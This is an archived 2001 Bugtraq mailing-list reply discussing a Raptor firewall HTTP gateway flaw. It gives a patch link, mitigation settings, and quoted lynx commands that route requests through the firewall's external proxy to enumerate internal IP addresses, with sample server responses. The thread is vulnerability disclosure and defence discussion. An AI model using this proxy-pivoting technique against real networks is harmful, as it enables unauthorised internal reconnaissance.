Bugtraq mailing list archives
Re: Raptor 6.5 http vulnerability
From: Lysel Christian Emre <chlys () WMDATA COM>
Date: Mon, 26 Mar 2001 22:34:30 +0200
Note, the patch can be downloaded from (for the international version): ftp://ftp.axent.com/pub/RaptorFirewall/International/Patches/NT6.5/
From: Alexander Bochmann [mailto:ab () gxis de] > 1. Problem Description > The Raptor firewall is vulnerability for forwarding http > request on other port numbers than 80, if a rule allows http > traffic. > When an extern or internal client, configures itself to use > the nearest interface as proxy, it's possible to access other > ports that 80 on the target host. > > 2.1 Non Vulnerable Versions > Raptor firewall 6.0.2. Depending on the configuration and on how you try it, 6.0.2 also seems to be vulnerable.
We have not noticed this.
I already noticed some months ago that the Raptor (6.0.2) firewall's http gateway possibly leaks information about an internal network with the method you described, if redirected services are used.
It does not leaks information about the internal network. The apache webserver can leak information from error pages: ..... Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, <email of webmaster> and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. ---------------------------------------------------------------------------- ---- Apache/1.3.9 Server at <hostname> Port <port> .......
It's possible to brute-force IP addresses used on a DMZ network: If you use the http gateway on the external interface as proxy, you can access internal IPs (and internal DNS names) directly - just try them all ;)
This should generate some logs! And can also be blocked by: http.urlpattern
Example:setenv http_proxy http://external.firewall.name:80/Now go on with something like...lynx -mime_header http://192.168.95.1:80/...you will either get 403 or 503 errors from the gateway (depending on it's configuration) for the destination:lynx -mime_header http://192.168.95.2:80/
This is the internal interface for the firewall, right?
HTTP/1.1 503 Service Unavailable MIME-Version: 1.0 Server: Simple, Secure Web Server 1.1 Date: Mon, 26 Mar 2001 14:59:29 GMT Connection: close Content-Type: text/html [.. etc ..] ...or, if you are lucky, an answer from a web server: % lynx -mime_header http://192.168.95.74:80/
And this is a request to the webserver? http.remove-header, should remove the headers :)
HTTP/1.1 200 OK Date: Mon, 26 Mar 2001 14:43:19 GMT Server: Apache/1.3.17 (Unix) mod_perl/1.24_01 PHP/3.0.18 Last-Modified: Thu, 15 Feb 2001 08:23:04 GMT Accept-Ranges: bytes Content-Length: 2490 Connection: close Content-Type: text/html <!doctype html public "-//IETF//DTD HTML//EN"> [.. etc ..]
Current thread:
- Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 25)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Erik Groennerud (Mar 27)
- <Possible follow-ups>
- Re: Raptor 6.5 http vulnerability Lysel Christian Emre (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 27)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)
- Re: Raptor 6.5 http vulnerability Alexander Bochmann (Mar 26)